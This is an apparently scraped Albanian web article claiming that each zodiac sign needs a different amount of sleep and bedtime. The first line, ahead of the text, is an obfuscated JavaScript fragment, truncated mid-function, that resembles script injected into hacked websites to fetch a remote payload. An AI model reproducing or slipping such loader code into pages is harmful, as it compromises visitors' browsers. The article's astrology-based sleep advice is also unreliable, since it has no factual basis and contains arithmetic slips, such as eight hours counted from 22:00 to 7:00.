;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sa orë gjumë ju duhen sipas horoskopit?

By

Çdo person ka më shumë gjasa të shkojë në shtrat për të fjetur në kohë të ndryshme bazuar në
shenjën e tij. Ndaj dhe ne do t’ju ndihmojmë të mësoni se kur është koha më e mirë për të shkuar
në shtrat, bazuar në shenjën tuaj të horoskopit. Supozojmë se keni për t’u zgjuar në orën 7:00 të
mëngjesit, kështu që:

Dashi mund t’ia dalë me 4 orë gjumë, kështu që mund të shkojë të flejë në orën 2:00-3:00 të
mëngjesit.

Demi ka nevojë për të paktën 7 orë gjumë, kështu që duhet të flejë që në orën 23:00.

Binjakët kanë nevojë për 6 orë gjumë, kështu që duhet të flenë rreth orë 1:00.

Gaforrja ka nevojë për 8 orë gjumë për t’u çlodhur kështu që duhet të flejë në orën 23:00.

Luanit i mjaftojnë 7 orë gjumë, kështu që mund të shkojë të flejë në orën 24:00.

Virgjëresha mund të durojë disa ditë me vetëm 3-4 orë gjumë, por do të vijë momenti që do të
dorëzohet keq. Gjithsesi fjetja në orën 4:00 është e zakonshme për virgjëreshat.

Në mënyrë për të dhënë maksimumin e tyre, Peshoret duhet të flenë në orën 23:00.

Akrepi në përgjithësi kanë probleme me gjumin dhe zgjimin në mëngjes. Në mënyrë që të bëjë
tetë orë gjumë Akrepi duhet të flejë në orën 22:00.

Një Shigjetar duhet të bëjë të paktën gjashtë orë gjumë në natë, që do të thotë se duhet të shkojë
në shtrat në orën 1 të mëngjesit.

Pa marrë parasysh se kur shkon në shtrat Bricjapi duhet të flejë 7 orë. Kjo do të thotë se nëse një

Bricjap duhet të jetë në orën 7 të mëngjesit në punë, ai duhet të flejë në 24:00.

Ujori është fizikisht dhe mentalisht më energjik në krahasim me shenjat e tjera të horoskopit, që
do të thotë se kjo shenjë mund të flejë rreth orës 3:00 të mëngjesit, të zgjohet në 7 dhe të vazhdojë
të kalojë ditën sikur ka bërë gjumë 8 orë.

Koha mesatare e Peshqve është 10 orë, që do të thotë se duhet të flenë në orën 21:00.

Artikuj të ngjashëm